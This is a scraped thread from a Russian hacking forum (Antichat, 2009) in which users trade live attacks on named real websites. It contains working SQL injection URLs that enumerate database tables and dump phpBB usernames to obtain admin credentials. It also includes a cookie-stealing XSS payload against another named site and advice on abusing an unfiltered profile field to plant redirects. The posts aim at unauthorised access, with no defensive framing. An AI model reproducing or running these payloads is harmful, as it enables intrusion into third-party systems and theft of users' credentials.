Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.01.2009, 15:50
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от Mixon
Ну,я так пишу,такой лексикон у мну,ничё тут не сделаешь...) вопщем та идея с css никак не прокатит вопше......надо чтото другое думать(( Вопшем тут такой баг,тут с редактироваем инфы,поле Имя заносится в mysql,и в нем можно любой код писать,там без фильтров всё,xss отлично работает,ну вот что можно бы придумать окроме xss? потому что ето вап сайт,и тут хсс почти бесполезно,потому что там почти все с телфонов,где яваскрипт не идет...(
Meta refresh, как я писал выше, только его надо будет быстро удалить, или поработать некоторое время в качестве прокси, который будет этот редирект вырезать с отдаваемой страницы.
P.S.
А если перерисовать страницу стилями то вернуть всё обратно будет просто, т.к. тебе надо будет либо почистить тот CSS который инклудится, либо поставить display: none !important; на всё то что ты добавил на страницу, и display: block !important; на всё что убрал.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 13.01.2009 в 15:59..
|
|
|
13.01.2009, 18:11
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
Народ, нужна помощь, есть скуля с таблами, есть табла phpbb_users, но она я так понял пустая....о воще все перебрал..не работают..помогите плиз, в чём ошибка?
версия 5.0.51a
скуля с таблами
Код:
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,table_name,4,5,6,7%20FROM%20INFORMATION_SCHEMA.TABLES
нада логин и пасс админа
Последний раз редактировалось vakula; 13.01.2009 в 18:18..
|
|
|
|
13.01.2009, 18:35
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%2 01,2,table_schema,4,5,6,7+from+information_schema. tables+where+table_name=0x70687062625F7573657273
forumvdn
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%2 01,2,database(),4,5,6,7
vdn
Таблица в другой базе
Поля
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%2 01,2,column_name,4,5,6,7+from+information_schema.c olumns+where+table_name=0x70687062625F7573657273
Вот вывод
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%2 01,2,username,4,5,6,7%20FROM%20forumvdn.phpbb_user s
А вот хелп на будующее:
https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597
|
|
|
|
14.01.2009, 04:36
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
Мужики, это уязвимость?
http://cronos.net.ru/qwests.php?id=1'
|
|
|
|
14.01.2009, 04:40
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545
Репутация:
242
|
|
Сообщение от vakula
Мужики, это уязвимость?
http://cronos.net.ru/qwests.php?id=1'
раскрытие путей, не более
|
|
|
|
14.01.2009, 04:48
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от vakula
Мужики, это уязвимость?
http://cronos.net.ru/qwests.php?id=1'
open_basedir ()
xss
http://cronos.net.ru/database.php?type=%3Cscript%3Ealert(document.cooki e)%3C/script%3E
Последний раз редактировалось AkyHa_MaTaTa; 14.01.2009 в 04:56..
|
|
|
|
14.01.2009, 05:56
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
угу...спс.
а не подскажите прогу для поиска sql уязвимостей на сайте?
а язна, гугль рулит....но хотелось бы ваши личные советы
|
|
|
|
14.01.2009, 06:05
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от vakula
Мужики, это уязвимость?
http://cronos.net.ru/qwests.php?id=1'
Там рядом скуля...
Код:
http://cronos.net.ru/database.php?id=4664+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22--
а не подскажите прогу для поиска sql уязвимостей на сайте?
а язна, гугль рулит....но хотелось бы ваши личные советы
Руки ^^
|
|
|
|
14.01.2009, 07:19
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Всем, хай.
Подскажите.
Есть скуля, далее:
=-77+union+select+1,2,3,4,5,6,7,8,9,10--
вываливается ошибка:
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10-- ' at line 4
Я так понимаю я не правильно строю запрос?
Попробовал несколько вариантов, тоже самое.
Подскажите, где косяк?
|
|
|
|
14.01.2009, 07:19
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
=-77'+union+select+1,2,3,4,5,6,7,8,9,10--
?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
